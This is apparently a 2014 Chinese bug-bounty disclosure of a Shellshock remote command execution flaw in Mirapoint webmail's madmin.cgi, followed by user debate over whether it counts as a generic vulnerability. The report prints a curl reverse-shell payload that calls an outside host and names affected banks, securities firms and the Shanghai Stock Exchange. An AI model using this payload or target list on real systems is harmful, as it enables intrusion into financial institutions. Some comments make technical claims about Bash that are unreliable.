某邮件系统BASH通用远程命令执行漏洞（影响多家银行及证券邮件系统）

Mirapoint Software, Inc. 是一家总部位于美国硅谷的美国全资公司。公司成立于1997年，在全球设立多个分公司和代表处，并于2000年成功进入中国市场。Mirapoint是SpecMail标准协会副主席, IETF成员，邮件RFC标准的参与制定者。Mirapoint 10多年来一直专注于提供专业的硬件邮件系统整体解决方案。

官网：http://**.**.**.**/

官网邮件系统演示

curl -A "() { :; }; /bin/bash -i > /dev/tcp/**.**.**.**/2345 0<&1 2>&1" http://**.**.**.**/cgi-bin/madmin.cgi -v

http://**.**.**.**/s?wd=WebMail%20Corporate%20Edition&rsv_spt=1&issp=1&f=8&rsv_bp=0&ie=utf-8&tn=baiduhome_pg

http://**.**.**.**/cgi-bin/madmin.cgi

http://**.**.**.**/cgi-bin/madmin.cgi

https://**.**.**.**//cgi-bin/madmin.cgi

http://**.**.**.**/cgi-bin/madmin.cgi

银行、政府、证券

上海银行：http://**.**.**.**/cgi-bin/madmin.cgi
 银联商务：http://**.**.**.**/cgi-bin/madmin.cgi
            http://**.**.**.**/cgi-bin/madmin.cgi
 长沙银行：**.**.**.**/cgi-bin/madmin.cgi
 安信证券：http://**.**.**.**/cgi-bin/madmin.cgi
 上海证券交易所：https://**.**.**.**/cgi-bin/madmin.cgi

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-29 13:43

厂商回复：

最新状态：

暂无

1. 2014-09-27 01:07 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )

   0

   这算通用嘛？

   1# 回复此人

2. 2014-09-27 08:08 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   @玉林嘎 跟st2类似

   2# 回复此人

3. 2014-09-27 10:10 | error ( 普通白帽子 | Rank:442 漏洞数:99 | https://github.com/sigma-random)

   0

   这标题有点欠揍

   3# 回复此人

4. 2014-09-27 12:16 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 | 于佳琦)

   0

   @error @乐乐、 @玉林嘎 bash是服务器里一种命令控制符软件，类似windows中的cmd，本身就unix系统自带的，又不是集成到邮件系统里的算毛通用漏洞？

   4# 回复此人

5. 2014-09-27 12:24 | 胖子 ( 普通白帽子 | Rank:103 漏洞数:26 | 加大你的带宽!加大你的内存!加大你的显示器...)

   0

   这标题有点欠揍

   5# 回复此人

6. 2014-09-27 12:52 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   0

   @玉林嘎 @乐乐、 @error @胖子 @X防部 乌云有乌云标准。你们在卧槽什么

   6# 回复此人

7. 2014-09-27 13:14 | error ( 普通白帽子 | Rank:442 漏洞数:99 | https://github.com/sigma-random)

   0

   哈哈,终于把此洞的路人甲逼现身了 @YY-2012 大牛一枚鉴定完毕

   7# 回复此人

8. 2014-09-27 13:32 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   0

   @error 你想多了。。

   8# 回复此人

9. 2014-09-27 13:54 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   @YY-2012 你哪只眼睛看见卧槽了

   9# 回复此人

10. 2014-09-27 14:06 | Siro ( 实习白帽子 | Rank:66 漏洞数:11 | ) <Freedom /> (Fuck)

    0

    目测括号是审核时候加的～

    10# 回复此人

11. 2014-09-27 14:55 | erevus ( 普通白帽子 | Rank:201 漏洞数:33 )

    0

    @X防部 按你的意思是 因为Struts2漏洞影响到用struts2开发CMS 也不算通用咯？

    11# 回复此人

12. 2014-09-27 15:16 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 | 于佳琦)

    2

    @erevus 如果一个CMS存在ST2当然算通用 因为这个ST2是打包在CMS里的！但是bash可不是打包进CMS的，是直接存在于操作系统里的，BASH确切的来说是系统软件漏洞，就算没有系统里没有bash，cms也可以运行。只不过系统里有bash，cms可以调用bash执行命令（bash本来就是命令执行工具相当于window里的cmd），如果系统里没有bash，cms调用不了bash所以就不存在漏洞。

    12# 回复此人

13. 2014-09-27 15:22 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 | 于佳琦)

    0

    @erevus 另外只有很少一部分Linux系统集成了这种名为Bash的Unix系统中用于控制命令提示符的软件，

    13# 回复此人

14. 2014-09-27 16:05 | 树上草 ( 路人 | Rank:20 漏洞数:8 | <img height="12" width="12" style="verti...)

    0

    这么叼，真的好吗

    14# 回复此人

15. 2014-09-27 17:31 | Suner ( 路人 | Rank:21 漏洞数:2 | 再读小学生)

    0

    欧巴都说屌

    15# 回复此人

16. 2014-09-27 19:34 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

    0

    @X防部 抱歉st2属于框架问题，不属于通用，如果PHP代码中附带了某些如system(bash)可与bash打交道的，属于程序设计缺陷吧

    16# 回复此人

17. 2014-09-27 23:21 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)

    0

    @X防部 很少的一部分？很多Linux发行版将bash作为默认shell的好吧……我能列举出RHEL系(CentOS也属于)、Ubuntu、Debian、Fedora等……

    17# 回复此人

18. 2014-12-26 08:55 | 黑暗游侠 ( 普通白帽子 | Rank:1800 漏洞数:274 | 123)

    1

    这个都有2个money啊。。我也是最了

    18# 回复此人